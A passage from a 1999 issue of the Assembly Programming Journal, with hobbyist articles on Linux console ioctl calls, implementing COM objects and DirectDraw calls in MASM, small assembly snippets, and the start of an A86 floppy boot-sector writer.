#--------------------------------------------------------------------BREAK

Next, calculate the frequency and duration of the tone to be played:
#---------------------------------------------------------------------CONT
		   mov dx, 666 	 ;duration
		   shl edx, 16
		   or dx, 1199 	 ;tone
#--------------------------------------------------------------------BREAK

Now, normally one might call ioctl as so:
		   push edx
		   push dword KDMKTONE
		   push eax
		   call ioctl
		   add esp, 12

However, ioctl is a systemcall, and we can save a bit of time by going
straight through the syscall gate at 0x80:
#---------------------------------------------------------------------CONT
		   mov ebx, eax
		   mov ecx, KDMKTONE
		   mov eax, 54 		 ;ioctl func defined in /usr/include/asm/unistd.h
		   int 0x80
		   ret
#----------------------------------------------------------------------EOF

So much for the simple beep. Another ASM 101 favorite is the 'blinking LED'
trick, where students learn to make the keyboard LEDs blink on and off in any
number of psychedelic patterns. A quick tour through the man page shows the
requests needed for this sample as well:

        KDGETLED
        Get state of LEDs.  argp points to a long int.  The
        lower  three  bits of *argp are set to the state of
        the LEDs, as follows:
            LED_CAP       0x04   caps lock led
            LED_NUM       0x02   num lock led
            LED_SCR       0x01   scroll lock led
        KDSETLED
        Set the LEDs.  The LEDs are set  to  correspond  to
        the lower three bits of argp.  However, if a higher
        order bit is set, the LEDs revert to  normal:  dis-
        playing the state of the keyboard functions of caps
        lock, num lock, and scroll lock.

The file descriptor must be opened as with the previous example. From there,
we must get the current LED state:
#--------------------------------------------------------------------led.asm

%define KDGETLED        0x4B31         ;grep KDGETLED /usr/include/linux/*
%define KDSETLED        0x4B32         ;grep KDSETLED /usr/include/linux/*

		   xor edx, edx
		   mov ecx, KDGETLED
		   mov ebx, eax
		   mov eax, 54
		   int 0x80
#--------------------------------------------------------------------BREAK

Next, all of the LEDs will be turned on and then off 10 times. It is vital
to the success of the algorithm that a delay be present between the off and
on transitions; otherwise the LEDs will appear to be steadily lit, and that
is much less of a programming achievement:
#---------------------------------------------------------------------CONT
		   mov ecx, 10
.here:
		   push ecx 				 ;save counter
		   or edx, 0x07 			 ;set all of 'em
		   mov ecx, KDSETLED
		   mov eax, 54
		   int 0x80

		   mov ecx, 0xFFFFFF 	 ;delay counter
.delay:
		   loop .delay

		   and edx, 0 			 ;turn all of them off
		   mov ecx, KDSETLED
		   mov eax, 54
		   int 0x80

		   mov ecx, 0xFFFFFF 	 ;next delay counter
.delay2:
		   loop .delay2

		   pop ecx
		   loop .here

		   ret
#----------------------------------------------------------------------EOF
Blinking the LEDs in succession and achieving hypnotic frequency via ioctl()
will be left as an exercise to the reader.

This should provide a quick introduction to using ioctl(). There are many more
possibilities available for scan codes, screen painting, and virtual console
control; further opportunities for console amusement exist also within the realm
of escape-sequence programming. The examples presented here can be compiled with
the standard
     nasm -f elf file.asm
	  gcc -o file file.o
combination, or by using a Makefile:
#----------------------------------------------------------------------Makefile
TARGET =beep 				  #TARGET is the variable storing the base filename

ASM = nasm                   #ASM contains the name of the assembler
ASMFILE = $(TARGET).asm      #ASMFILE contains the full name of the source file
OBJFILE = $(TARGET).o        #OBJFILE contains the full name of the object file
LINKER = gcc                 #LINKER contains the full name of the linker
LIBS =                       #LIBS contains any library flags
LIBDIR =                     #LIBDIR contains any library location flags

all:                         #the 'all:' section applies to all targets
	 $(ASM) -o $(OBJFILE) -f elf $(ASMFILE)
	 $(LINKER) -o $(TARGET) $(OBJFILE) $(LIBDIR) $(LIBS)
#---------------------------------------------------------------------------EOF
As with all Makefiles, with the target correctly set the source will be compiled
and linked simply by typing 'make' in the directory where the Makefile is
located.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
																			   BinToString
                                                            by Cecchinel Stephan


;Summary:       Converts a 32 bit number to an 8-byte string.
;Compatibility: MMX+
;Notes: 		 14 cycles. Input is stored in EAX; the output is a hex-
;               format character string pointed to by [EDI].
Sum1:     dd  0x30303030, 0x30303030
Mask1:    dd  0x0f0f0f0f, 0x0f0f0f0f
Comp1:    dd  0x09090909, 0x09090909
Hex32:
         bswap  eax
         movq  mm3,[Sum1]
         movq  mm4,[Comp1]
         movq  mm2,[Mask1]
         movq  mm5,mm3
         psubb  mm5,mm4
         movd  mm0,eax
         movq  mm1,mm0
         psrlq  mm0,4
         pand  mm0,mm2
         pand  mm1,mm2
         punpcklbw mm0,mm1
         movq  mm1,mm0
         pcmpgtb mm0,mm4
         pand  mm0,mm5
         paddb  mm1,mm3
         paddb  mm1,mm0
         movq  [edi],mm1
         ret



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
                                                               Absolute Value
																				   by Laura Fairhead


The Challenge
-------------
Find the absolute value of a register in only 4 bytes.

The Solution
------------

         NEG AX
         JL SHORT $-4

This was not completely my original idea (is there such thing??); I
found a similar sequence which used the more obvious branch 'JS'. The
JS had the problem that it goes into an infinite loop if AX=08000h.





::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.......................................................FIN

#13 From: "Michael Mondragon" <mammon_@...>
Date: Tue Sep 21, 1999 7:02 am
Subject: APJ Issue#5 July-Sep 99
mammon_@...
Send Email Send Email
 
______________________________________________________
::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.                                               July-Sep  99
:::\_____\::::::::::.                                              Issue      5
::::::::::::::::::::::.........................................................

             A S S E M B L Y   P R O G R A M M I N G   J O U R N A L
                       http://asmjournal.freeservers.com
                            asmjournal@...




T A B L E   O F   C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_

"COM in Assembly Part II"...................................Bill.Tyler

"How to use DirectDraw in ASM"...............................X-Calibre

"Writing Boot Sectors To Disk"...........................Jan.Verhoeven

"Dumping Memory to Disk".................................Jan.Verhoeven

"Formatted Numeric Output"..............................Laura.Fairhead

"Linked Lists in ASM"..........................................mammon_

Column: Win32 Assembly Programming
     "Structured Exception Handling under Win32"...........Chris.Dragan
     "Child Window Controls"...................................Iczelion
     "Dialog Box as Main Window"...............................Iczelion
     "Standardizing Win32 Callback Procedures"............Jeremy.Gordon

Column: The Unix World
     "Fire Demo ported to Linux SVGAlib".................Jan.Wagemakers

Column: Assembly Language Snippets
     "Abs".................................................Chris.Dragan
     "Min".................................................Chris.Dragan
     "Max".................................................Chris.Dragan
     "OBJECT"...................................................mammon_

Column: Issue Solution
     "Binary to ASCII"....................................Jan.Verhoeven

----------------------------------------------------------------------
        ++++++++++++++++++Issue  Challenge+++++++++++++++++
          Convert a bit value to ACIII less than 10 bytes
----------------------------------------------------------------------



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
                                                                      by mammon_


I suppose I should start with the good news. A week or so ago Hiroshimator
emailed me for the nth time asking if I needed help with the journal as I have
yet to get one out on time. I relented and asked if he knew any listservers;
one hour later he had an account for APJ set up at e-groups, specifically:
              http://www.egroups.com/group/apj-announce
One of the greatest obstacles to putting out these issues -- processing the
300 or so subscription requests that rack up between issues -- is now out of
the way for good.

The articles this month have somewhat of a high-level focus; with the COM and
Direct Draw by Bill Tyler and X-Caliber, respectively, as well as Chris
Dragan's classic work on exception handling and Jeremy Gordon's treatment of
windows callbacks, this issue is heavily weighed towards high-level win32
coding. Add to this Iczelion's two tutorials and my own win32-biased
linked list example, and it appears the DOS/Unix camp is losing ground.

To shore up the Unix front line, Jan Wagemakers has provided a port of last
month's fire demo to linux [GAS]. In addition, there are A86 articles by Jan
Verhoeven and a general assembly routine by Laura Fairhead to prove that not
all assembly has to be 32-bit.

And, finally, I am looking for a good 'challenge' columnist: someone to write
the monthly APJ challenges [and their solutions] so that I can start
announcing next month's challenge sooner than next month...

Now at last I can sleep ;)

_m


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                         COM in Assembly Part II
						         by Bill Tyler


My previous atricle described how to use COM objects in your assembly
language programs.  It described only how to call COM methods, but not how to
create your own COM objects.  This article will describe how to do that.

This article will describe implementing COM Objects, using MASM syntax.  TASM
or NASM assemblers will not be considered, however the methods can be easily
applied to any assembler.

This article will also not describe some of the more advanced features of COM
such as reuse, threading, servers/clients, and so on.  These will presented
in future articles.


COM Interfaces Review
------------------------------------------------------------------------------
An interface definition specifies the interface's methods, their return types,
the number and types of their parameters, and what the methods must do.  Here
is a sample interface definition:

IInterface struct
     lpVtbl  dd  ?
IInterface ends

IInterfaceVtbl struct
     ; IUnknown methods
     STDMETHOD       QueryInterface, :DWORD, :DWORD, :DWORD
     STDMETHOD       AddRef, :DWORD
     STDMETHOD       Release, :DWORD
     ; IInterface methods
     STDMETHOD       Method1, :DWORD
     STDMETHOD       Method2, :DWORD
IInterfaceVtbl ends

STDMETHOD is used to simplify the interface declaration, and is defined as:

STDMETHOD MACRO name, argl :VARARG
     LOCAL @tmp_a
     LOCAL @tmp_b
     @tmp_a TYPEDEF PROTO argl
     @tmp_b TYPEDEF PTR @tmp_a
     name @tmp_b ?
ENDM

This macro is used to greatly simplify interface declarations, and so that the
MASM invoke syntax can be used. (Macro originally by Ewald :)

Access to the interface's methods occurs through a pointer.  This pointer
points to a table of function pointers, called a vtable. Here is a sample
method call:

mov     eax, [lpif]                            ; lpif is the interface pointer
mov     eax, [eax]                             ; get the address of the vtable
invoke  (IInterfaceVtbl [eax]).Method1, [lpif] ; indirect call to the function
- or -
invoke  [eax][IInterfaceVtbl.Method2], [lpif]  ; alternate notation

Two different styles of addressing the members are shown.  Both notations
produce equivalent code, so the method used is a matter of personal
preference.

All interfaces must inherit from the IUnknown interface.  This means that the
first 3 methods of the vtable must be QueryInterface, AddRef, and Release.
The purpose and implementation of these methods will be discussed later.


GUIDS
------------------------------------------------------------------------------
A GUID is a Globally Unique ID.  A GUID is a 16-byte number, that is unique
to an interface.  COM uses GUID's to identify different interfaces from one
another.  Using this method prevents name clashing as well as version
clashing.  To get a GUID, you use a generator utility that is included with
most win32 development packages.

A GUID is represented by the following structure:

GUID STRUCT
     Data1   dd ?
     Data2   dw ?
     Data3   dw ?
     Data4   db 8 dup(?)
GUID ENDS

A GUID is then defined in the data section:
MyGUID GUID <3F2504E0h, 4f89h, 11D3h, <9Ah, 0C3h, 0h, 0h, 0E8h, 2Ch, 3h, 1h>>

Once a GUID is assigned to an interface and published, no furthur changes to
the interface definition are allowed.  Note, that this does mean that the
interface implementation may not change, only the definition.  For changes
to the interface definition, a new GUID must be assigned.


COM Objects
------------------------------------------------------------------------------
A COM object is simply an implementation of an interface.  Implementation
details are not covered by the COM standard, so we are free to implement our
objects as we choose, so long as they satisfy all the requirements of the
interface definition.

A typical object will contain pointers to the various interfaces it supports,
a reference count, and any other data that the object needs.  Here is a sample
object definition, implemented as a structure:

Object struct
     interface   IInterface  <?>     ; pointer to an IInterface
     nRefCount   dd          ?       ; reference count
     nValue      dd          ?       ; private object data
Object ends

We also have to define the vtable's we are going to be using.  These tables
must be static, and cannot change during run-time.  Each member of the vtable
is a pointer to a method.  Following is a method for defining the vtable.

@@IInterface segment dword
vtblIInterface:
     dd      offset IInterface@QueryInterface
     dd      offset IInterface@AddRef
     dd      offset IInterface@Release
     dd      offset IInterface@GetValue
     dd      offset IInterface@SetValue
@@IInterface ends


Reference Counting
------------------------------------------------------------------------------
COM object manage their lifetimes through reference counting.  Each object
maintains a reference count that keeps track of how many instances of the
interface pointer have been created.  The object is required to keep a
counter that supports 2^32 instances, meaning the reference count must be a
DWORD.

When the reference count drops to zero, the object is no longer in use, and
it destroys itself.  The 2 IUnknown methods AddRef and Release handle the
reference counting for a COM object.


QueryInterface
------------------------------------------------------------------------------
The QueryInterface method is used by a COM object to determine if the object
supports a given interface, and then if supported, to get the interface
pointer.  There are 3 rules to implementing the QueryInterface method:

     1. Objects must have an identity - a call to QueryInterface must always
        return the same pointer value.
     2. The set of interfaces of an object must never change - for example, if
        a call to QueryInterface with on IID succeeds once, it must succeed
        always.  Likewise, if it fails once, it must fail always.
     3. It must be possible to successfully query an interface of an object
        from any other interface.

QueryInterface returns a pointer to a specified interface on an object to
which a client currently holds an interface pointer. This function must call
the AddRef method on the pointer it returns.

Following are the QueryInterface parameters:
     pif  : [in] a pointer to the calling interface
     riid : [in] pointer to the IID of the interface being queried
     ppv  : [out] pointer to the pointer of the interface that is to be set.
            If the interface is not supported, the pointed to value is set to 0

QueryInterface returns the following:
    S_OK if the interface is supported
    E_NOINTERFACE if not supported

Here is a simple assembly implementation of QueryInterface:

IInterface@QueryInterface proc uses ebx pif:DWORD, riid:DWORD, ppv:DWORD
     ; The following compares the requested IID with the available ones.
     ; In this case, because IInterface inherits from IUnknown, the IInterface
     ; interface is prefixed with the IUnknown methods, and these 2 interfaces
     ; share the same interface pointer.
     invoke  IsEqualGUID, [riid], addr IID_IInterface
     or      eax,eax
     jnz     @1
     invoke  IsEqualGUID, [riid], addr IID_IUnknown
     or      eax,eax
     jnz     @1
     jmp     @NoInterface

@1:
     ; GETOBJECTPOINTER is a macro that will put the object pointer into eax,
     ; when given the name of the object, the name of the interface, and the
     ; interface pointer.
     GETOBJECTPOINTER    Object, interface, pif

     ; now get the pointer to the requested interface
     lea     eax, (Object ptr [eax]).interface

     ; set *ppv with this interface pointer
     mov     ebx, [ppv]
     mov     dword ptr [ebx], eax

     ; increment the reference count by calling AddRef
     GETOBJECTPOINTER    Object, interface, pif
     mov     eax, (Object ptr [eax]).interface
     invoke  (IInterfaceVtbl ptr [eax]).AddRef, pif

     ; return S_OK
     mov     eax, S_OK
     jmp     return

@NoInterface:
     ; interface not supported, so set *ppv to zero
     mov     eax, [ppv]
     mov     dword ptr [eax], 0

     ; return E_NOINTERFACE
     mov     eax, E_NOINTERFACE

return:
     ret
IInterface@QueryInterface endp


AddRef
------------------------------------------------------------------------------
The AddRef method is used to increment the reference count for an interface
of an object.  It should be called for every new copy of an interface pointer
to an object.

AddRef takes no parameters, other than the interface pointer required for all
methods.  AddRef should return the new reference count.  However, this value
is to be used by callers only for testing purposes, as it may be unstable in
certain situations.

Following is a simple implementation of the AddRef method:

IInterface@AddRef proc pif:DWORD
     GETOBJECTPOINTER    Object, interface, pif
     ; increment the reference count
     inc     [(Object ptr [eax]).nRefCount]
     ; now return the count
     mov     eax, [(Object ptr [eax]).nRefCount]
     ret
IInterface@AddRef endp


Release
------------------------------------------------------------------------------
Release decrements the reference count for the calling interface on a object.
If the reference count on the object is decrememnted to 0, then the object is
freed from memory.  This function should be called when you no longer need to
use an interface pointer

Like AddRef, Release takes only one parameter - the interface pointer.  It
also returns the current value of the reference count, which, similarly, is to
be used for testing purposess only

Here is a simple implementation of Release:

IInterface@Release proc pif:DWORD
     GETOBJECTPOINTER    Object, interface, pif

     ; decrement the reference count
     dec     [(Object ptr [eax]).nRefCount]

     ; check to see if the reference count is zero.  If it is, then destroy
     ; the object.
     mov     eax, [(Object ptr [eax]).nRefCount]
     or      eax, eax
     jnz     @1

     ; free the object: here we have assumed the object was allocated with
     ; LocalAlloc and with LMEM_FIXED option
     GETOBJECTPOINTER    Object, interface, pif
     invoke  LocalFree, eax
@1:
     ret
IInterface@Release endp


Creating a COM object
------------------------------------------------------------------------------
Creating an object consists basically of allocating the memory for the
object, and then initializing its data members.  Typically, the vtable
pointer is initialized and the reference count is zeroed.  QueryInterface
could then be called to get the interface pointer.

Other methods exist for creating objects, such as using CoCreateInstance, and
using class factories.  These methods will not be discussed, and may be a
topic for a future article.


COM implementatiion sample application
------------------------------------------------------------------------------
Here follows a sample implementation and usage of a COM object.  It shows how
to create the object, call its methods, then free it.  It would probably be
very educational to assemble this and run it through a debugger.  This and
other examples can be found at http://asm.tsx.org.


.386
.model flat,stdcall

include windows.inc
include kernel32.inc
include user32.inc

includelib kernel32.lib
includelib user32.lib
includelib uuid.lib

;-----------------------------------------------------------------------------
; Macro to simply interface declarations
; Borrowed from Ewald, http://here.is/diamond/
STDMETHOD   MACRO   name, argl :VARARG
LOCAL @tmp_a
LOCAL @tmp_b
@tmp_a  TYPEDEF PROTO argl
@tmp_b  TYPEDEF PTR @tmp_a
name    @tmp_b      ?
ENDM

; Macro that takes an interface pointer and returns the implementation
; pointer in eax
GETOBJECTPOINTER MACRO Object, Interface, pif
     mov     eax, pif
     IF (Object.Interface)
         sub     eax, Object.Interface
     ENDIF
ENDM

;-----------------------------------------------------------------------------
IInterface@QueryInterface   proto :DWORD, :DWORD, :DWORD
IInterface@AddRef           proto :DWORD
IInterface@Release          proto :DWORD
IInterface@Get              proto :DWORD
IInterface@Set              proto :DWORD, :DWORD

CreateObject                proto :DWORD
IsEqualGUID                 proto :DWORD, :DWORD

externdef                   IID_IUnknown:GUID

;-----------------------------------------------------------------------------
; declare the interface prototype
IInterface struct
     lpVtbl  dd  ?
IInterface ends

IInterfaceVtbl struct
     ; IUnknown methods
     STDMETHOD       QueryInterface, pif:DWORD, riid:DWORD, ppv:DWORD
     STDMETHOD       AddRef, pif:DWORD
     STDMETHOD       Release, pif:DWORD
     ; IInterface methods
     STDMETHOD       GetValue, pif:DWORD
     STDMETHOD       SetValue, pif:DWORD, val:DWORD
IInterfaceVtbl ends


; declare the object structure
Object struct
     ; interface object
     interface   IInterface  <?>

     ; object data
     nRefCount   dd          ?
     nValue      dd          ?
Object ends

;-----------------------------------------------------------------------------
.data
; define the vtable
@@IInterface segment dword
vtblIInterface:
     dd      offset IInterface@QueryInterface
     dd      offset IInterface@AddRef
     dd      offset IInterface@Release
     dd      offset IInterface@GetValue
     dd      offset IInterface@SetValue
@@IInterface ends

; define the interface's IID
; {CF2504E0-4F89-11d3-9AC3-0000E82C0301}
IID_IInterface GUID <0cf2504e0h, 04f89h, 011d3h, <09ah, 0c3h, 00h, 00h,
                       0e8h, 02ch, 03h, 01h>>

;-----------------------------------------------------------------------------
.code
start:
StartProc proc
     LOCAL   pif:DWORD       ; interface pointer

     ; create the object
     invoke  CreateObject, addr [pif]
     or      eax,eax
     js      exit

     ; call the SetValue method
     mov     eax, [pif]
     mov     eax, [eax]
     invoke  (IInterfaceVtbl ptr [eax]).SetValue, [pif], 12345h

     ; call the GetValue method
     mov     eax, [pif]
     mov     eax, [eax]
     invoke  (IInterfaceVtbl ptr [eax]).GetValue, [pif]

     ; release the object
     mov     eax, [pif]
     mov     eax, [eax]
     invoke  (IInterfaceVtbl ptr [eax]).Release, [pif]

exit:
     ret
StartProc endp

;-----------------------------------------------------------------------------
IInterface@QueryInterface proc uses ebx pif:DWORD, riid:DWORD, ppv:DWORD
     invoke  IsEqualGUID, [riid], addr IID_IInterface
     test    eax,eax
     jnz     @F
     invoke  IsEqualGUID, [riid], addr IID_IUnknown
     test    eax,eax
     jnz     @F
     jmp     @Error

@@:
     GETOBJECTPOINTER    Object, interface, pif
     lea     eax, (Object ptr [eax]).interface

     ; set *ppv
     mov     ebx, [ppv]
     mov     dword ptr [ebx], eax

     ; increment the reference count
     GETOBJECTPOINTER    Object, interface, pif
     mov     eax, (Object ptr [eax]).interface
     invoke  (IInterfaceVtbl ptr [eax]).AddRef, [pif]

     ; return S_OK
     mov     eax, S_OK
     jmp     return

@Error:
     ; error, interface not supported
     mov     eax, [ppv]
     mov     dword ptr [eax], 0
     mov     eax, E_NOINTERFACE

return:
     ret
IInterface@QueryInterface endp


IInterface@AddRef proc pif:DWORD
     GETOBJECTPOINTER    Object, interface, pif
     inc     [(Object ptr [eax]).nRefCount]
     mov     eax, [(Object ptr [eax]).nRefCount]
     ret
IInterface@AddRef endp


IInterface@Release proc pif:DWORD
     GETOBJECTPOINTER    Object, interface, pif
     dec     [(Object ptr [eax]).nRefCount]
     mov     eax, [(Object ptr [eax]).nRefCount]
     or      eax, eax
     jnz     @1
     ; free object
     mov     eax, [pif]
     mov     eax, [eax]
     invoke  LocalFree, eax
@1:
     ret
IInterface@Release endp


IInterface@GetValue proc pif:DWORD
     GETOBJECTPOINTER    Object, interface, pif
     mov     eax, (Object ptr [eax]).nValue
     ret
IInterface@GetValue endp


IInterface@SetValue proc uses ebx pif:DWORD, val:DWORD
     GETOBJECTPOINTER    Object, interface, pif
     mov     ebx, eax
     mov     eax, [val]
     mov     (Object ptr [ebx]).nValue, eax
     ret
IInterface@SetValue endp

;-----------------------------------------------------------------------------
CreateObject proc uses ebx ecx pobj:DWORD
     ; set *ppv to 0
     mov     eax, pobj
     mov     dword ptr [eax], 0

     ; allocate object
     invoke  LocalAlloc, LMEM_FIXED, sizeof Object
     or      eax, eax
     jnz     @1
     ; alloc failed, so return
     mov     eax, E_OUTOFMEMORY
     jmp     return
@1:

     mov     ebx, eax
     mov     (Object ptr [ebx]).interface.lpVtbl, offset vtblIInterface
     mov     (Object ptr [ebx]).nRefCount, 0
     mov     (Object ptr [ebx]).nValue, 0

     ; Query the interface
     lea     ecx, (Object ptr [ebx]).interface
     mov     eax, (Object ptr [ebx]).interface.lpVtbl
     invoke  (IInterfaceVtbl ptr [eax]).QueryInterface,
             ecx,
             addr IID_IInterface,
             [pobj]
     cmp     eax, S_OK
     je      return

     ; error in QueryInterface, so free memory
     push    eax
     invoke  LocalFree, ebx
     pop     eax

return:
     ret
CreateObject endp

;-----------------------------------------------------------------------------
IsEqualGUID proc rguid1:DWORD, rguid2:DWORD
     cld
     mov     esi, [rguid1]
     mov     edi, [rguid2]
     mov     ecx, sizeof GUID / 4
     repe    cmpsd
     xor     eax, eax
     or      ecx, ecx
     setz    al
     ret
IsEqualGUID endp

end start


Conclusion
------------------------------------------------------------------------------
We have (hopefully) seen how to implement a COM object.  We can see that it
is a bit messy to do, and adds quite some overhead to our programs.  However,
it can also add great flexibility and power to our programs.

Remember that COM defines only interfaces, and implementation is left to the
programmer.  This article presents only one possible implementation.  This is
not the only method, nor is it the best one.  The reader should feel free to
experiment with other methods.

                 Copyright (C) 1999 Bill Tyler  (billasm@...)



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..........................................FEATURE.ARTICLE
                                                   How to use DirectDraw in ASM
                                                   by X-Calibre [Diamond]


Well, there has been quite a large demand for this essay, so I finally started
writing it. This essay will show you how to use C++ objects and COM interface
in Win32ASM, using DirectDraw as an example.

Well, in this part of the Win32 API, you will soon find out how important it
is to know C and C++ when you want to use an API written in these languages.
Judging from the demand for this essay, I think it will be necessary to
explain a bit of how objects work in C++. I will not go too deep, but only
show the things you need to know in Win32ASM.

What are objects really?

Actually a structure is an object of which all fields are public. We will look
at it the other way around. So the public fields in an object make up a
structure. The other fields in an object are private and are not reachable
from the outside. So they are not interesting to us.

A special thing about objects is that they can contain pointers to functions.
Normally, when using C or ASM, this would be possible, but a bit error-prone.
It can be seen as 'dirty' programming. That's why you probably haven't seen it
before.

When using C++ with a compiler, there will be no errors, as long as the
compiler does its job. So here you can use this technique with no chance of
errors, and it gives you some nice new programming options.

C++ goes even further with this 'structure of functions' idea. With
inheritance, you can also overwrite functions of the base class in the
inherited class. You can also create 'virtual' functions, which are defined in
the base class, but the actual code is only in inherited classes.

This is of course interesting for DirectX, where you want to have standard
functions, but with different code, depending on the hardware on which it is
running. So in DirectX, all functions are defined as virtual, and the base
class is inherited by hardware-specific drivers which supply hardware-specific
code. And the beauty of this is, that it's all transparent to the programmer.
The function pointers can change at runtime because of this system, so the C++
designers had to think of a way to keep the pointers to the functions
available to the program at all time.

What this all boils down to is that there is a table with pointers to the
functions. It's called the Virtual Function Table. I will call this the
vtable from now on.

So we need to get this table, in order to call functions from our object.
Lucky for you, Z-Nith has already made a C program to 'capture' the table,
and converted the resulting header file to an include file for use with MASM.
So I'll just explain how you should use this table, and you can get going
soon.

Well, actually it's quite simple. The DirectX objects are defined like this:

IDirectDraw        STRUC
     lpVtbl DWORD ?
IDirectDraw        ENDS

IDirectDrawPalette STRUC
     lpVtbl DWORD ?
IDirectDrawPalette ENDS

IDirectDrawClipper STRUC
     lpVtbl DWORD ?
IDirectDrawClipper ENDS

IDirectDrawSurface STRUC
     lpVtbl DWORD ?
IDirectDrawSurface ENDS

So these structs are actually just a pointer to the vtables, and don't contain
any other values. Well, this makes it all very easy for us then.
I'll give you a small example:

Say we have an IDirectDraw object called lpDD. And we want to call the
RestoreDisplayMode function.
Then we need to do 2 things:

1. Get the vtable.
2. Get the address of the function, using the vtable.

The first part is simple. All the struct contains, is the pointer to the
vtable. So we can just do this:

     mov  eax, [lpDD]
     mov  eax, [eax]

Simple, isn't it? And the next part isn't really much harder. The vtable is
put into a structure called IDirectDrawVtbl in DDRAW.INC. We now have the
address of the structure in eax. All we have to do now, is get the correct
member of that structure, to get the address of the function we want to call.
You would have guessed by now, that this will do the trick:

     call [IDirectDrawVtbl.RestoreDisplayMode][eax]

That is not a bad guess...
But there's one more thing, which is very important: this function needs to be
invoked on the IDirectDraw object. We may only see the vtable in the structure,
but there are also private members inside the object. So there's more than
meets the eye here. What it comes down to is that the call needs the object
as an argument. And this will be done by stack as always. So we just need to
push lpDD before we call. The complete call will look like this:

     push [lpDD]
     call [IDirectDrawVtbl.RestoreDisplayMode][eax]

Simple, was it not? And calls with arguments are not much harder.
Let's set the displaymode to 320x200 in 32 bits next.
This call requires 3 arguments:

SetDisplayMode( width, height, bpp );

Well, the extra arguments work just like normal API calls: just push them onto
the stack in backward order.
So it will look like this:

     push 32
     push 200
     push 320
     mov  eax, [lpDD]
     push eax
     mov  eax, [eax]
     call [IDirectDrawVtbl.SetDisplayMode][eax]

And that's all there is to it.

To make life easier, we have included some MASM macros in DDRAW.INC, for use
with the IDirectDraw and IDirectDrawSurface objects:

DDINVOKE  MACRO   func, this, arglist :VARARG
     mov  eax, [this]
     mov  eax, [eax]

     IFB <arglist>
         INVOKE [IDirectDrawVtbl. func][eax], this
     ELSE
         INVOKE [IDirectDrawVtbl. func][eax], this, arglist
     ENDIF
ENDM

DDSINVOKE MACRO   func, this, arglist :VARARG
     mov  eax, [this]
     mov  eax,  [eax]

     IFB <arglist>
         INVOKE [IDirectDrawSurfaceVtbl. func][eax], this
     ELSE
         INVOKE [IDirectDrawSurfaceVtbl. func][eax], this, arglist
     ENDIF
ENDM

With these macros, our 2 example calls will look as simple as this:

     DDINVOKE RestoreDisplayMode, lpDD

     DDINVOKE SetDisplayMode, lpDD, 320, 200, 32


Well, that's basically all there is to know about using objects, COM and
DirectX in Win32ASM. Have fun with it!

And remember:

C and C++ knowledge is power!



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                    Writing Boot Sectors To Disk
                                                    by Jan Verhoeven


Introduction.
-------------
In my previous article I showed how to make a private non-bootable
bootsector for 1.44 Mb floppy disks. Unfortunately, there was no way yet to
write that non-bootsector to a floppy disk....

Enter this code. It is the accompanying bootsector writer for floppy disks.
It assumes that your A: drive is the 1.44 Mb floppy disk drive and I dare
say that this will be true in the majority of cases.


The assembler used
------------------
As usual, I have written this code in A86 format. Until now, not many
aspects of the A86 extensions have been used, but, believe me, in future
articles this will be done.

A86 is particularly useful for people that make syntax errors. It will
insert the errormessages into the sourcefile so that you can easily find
them back. In the next assembler run the error messages are removed again.

To fully use this aspect of A86 programming, I made a small batchfile that
will let me choose between several options while writing the code. Below
you can see the file. After an error, I choose to go back into the editor.
When there are no errors, I might decided to do a trial run. Or to quit to
DOS.

This is all done by means of the WACHT command which waits for a keypress.
It returns (in errorlevel) the indexed position in the command tail table
of th key which was pressed.


Rapid assembly prototyping.
---------------------------
For easy processing and running sourcefiles I use a small batchfile, which
looks like:

----------- Run.Bat --------------------------------------- Start ---------
@echo off
if "%1" == "" goto leave

:start
    ed %1.a86
    a86 %1.a86 %2 %3 %4 %5 %6

:menu
    Echo *
    Echo Options:
    Echo *Escape = stop
    Echo *     L = LIST
    echo *  ;-() = back to the editor
    echo * space = test-run of %1.com
    echo *Period = debugger-run with %1.com/sym

    wacht  .\=-[]';-()/":?><{}|+_LCE

if errorlevel 27 goto start
if errorlevel 26 goto screen
if errorlevel 25 goto list
if errorlevel  4 goto start
if errorlevel  3 goto debugger
if errorlevel  2 goto execute
if errorlevel  1 exit
goto menu

:execute
   %1
   if errorlevel 9 echo Errorlevel = 9+
   if errorlevel 8 echo Errorlevel = 8
   if errorlevel 7 echo Errorlevel = 7
   if errorlevel 6 echo Errorlevel = 6
   if errorlevel 5 echo Errorlevel = 5
   if errorlevel 4 echo Errorlevel = 4
   if errorlevel 3 echo Errorlevel = 3
   if errorlevel 2 echo Errorlevel = 2
   if errorlevel 1 echo Errorlevel = 1
   goto menu

:debugger
   vgamode 3
   d86 %1
   goto menu

:list
   list
   goto menu

:screen
   vgamode 3
   goto menu

:leave
   echo No file specified
----------- Run.Bat ---------------------------------------- End ----------

This BAT file relies heavily on my computer system. For one, I use DR-DOS 6
which means that I can use the EXIT word to get out of a Batchfile.

Also, I switch videomodes back to Mode 3 with "Vgamode 3" and you will have
to use another command for that, like "Mode co80" or using the utillity
that came with your videocard.

The program "List" is Vernon Buerg's file lister which I use to track down
errors in all kinds of files.


How to write a sector to disk.
------------------------------
Globally there are three methods. The first would be to program the floppy
disk controller, but that is just downright difficult. A second approach
would be to use INT 026, the way DOS does things.

I chose for the BIOS method. For non-partitioned diskstructures this is the
easiest way. Just select track, head and side and write data to the sectors
on that disk.

The bootsector is the very first sector on a disk. For a floppy disk this
boils down to track 0, head 0 and sector 1 (sectors are counted from 1, not
from 0!).

The code is very straightforward. What it does is:

  - reset disk drive controller
